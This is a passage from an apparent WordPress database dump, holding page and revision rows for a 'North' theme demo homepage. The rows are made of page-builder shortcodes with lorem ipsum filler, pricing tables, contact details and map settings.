!important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home11','','inherit','closed','closed','','753-revision-v1','','','2014-07-15 20:01:35','2014-07-15 20:01:35','',753,'http://highperformingstudent.com/2014/07/15/753-revision-v1/',0,'revision','',0),(761,1,'2014-07-15 20:14:54','2014-07-15 20:14:54','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][rev_slider_vc alias=\"north_home12\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483567360{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"4\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"yes\" posts_nr=\"9\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner css=\".vc_custom_1409241287891{margin-bottom: -30px !important;}\"][vc_column_inner width=\"1/3\" css=\".vc_custom_1409241343251{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1409240908382{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1409241349337{padding-top: 80px !important;padding-right: 0px !important;padding-left: 0px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710109493{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506433699{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774028101{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a3846118-b2da\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a3846118-b2da\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-66118-b2da\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home12','','publish','open','open','','home12','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=761',0,'page','',0),(1927,1,'2014-07-15 20:14:54','2014-07-15 20:14:54','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][rev_slider_vc alias=\"north_home12\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%